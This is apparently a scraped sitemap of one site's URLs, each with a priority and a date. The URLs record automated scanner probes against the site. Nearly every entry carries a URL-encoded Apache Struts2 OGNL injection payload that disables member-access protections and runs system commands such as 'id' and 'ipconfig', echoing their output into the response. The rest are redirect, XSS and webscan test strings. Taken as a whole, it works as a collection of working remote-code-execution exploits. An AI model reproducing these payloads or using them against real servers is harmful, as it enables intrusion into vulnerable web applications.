http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=mnfbv 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2534%2536%2536 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=m22d2 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 